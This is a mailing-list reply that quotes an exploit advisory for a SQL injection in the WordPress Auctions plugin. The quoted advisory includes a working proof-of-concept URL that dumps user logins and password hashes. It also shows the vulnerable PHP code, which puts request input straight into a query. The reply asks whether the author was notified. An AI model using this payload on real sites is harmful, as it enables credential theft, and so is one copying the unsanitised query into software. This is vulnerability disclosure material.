On Wed, Sep 14, 2011 at 12:04:03PM -0300, Heyder[AlligatorTeam] wrote: > # Exploit Title: WordPress Auctions plugin <= 1.8.8 SQL Injection > Vulnerability > # Date: 2011-09-09 > # Author: sherl0ck_ <sherl0ck_[at]alligatorteam[dot]org> > @AlligatorTeam > # Software Link: http://downloads.wordpress.org/plugin/wp-auctions.zip > # Version: 1.8.8 (tested) > > --------------- > PoC > --------------- > > URL: > http://localhost/wordpress/wp-admin/admin.php?page=wp-auctions-add&wpa_action=edit&wpa_id=-1+union+all+select+1,2,3,USER(),concat(user_login,char(58),user_pass),DATABASE(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+wp_users&_wpnonce=e04f105b8e > > --------------- > Vulnerable code > --------------- > ... > elseif($_GET["wpa_action"] == "edit"): > $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"]; > ... > elseif($_GET["wpa_action"] == "relist"): > $strSQL = "SELECT * FROM ".$table_name." WHERE id=".$_GET["wpa_id"]; > ... > $resultList = $wpdb->get_row($strSQL); > ...
Did you report this issue to the author of the plugin? Best regards, Henri Salo _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
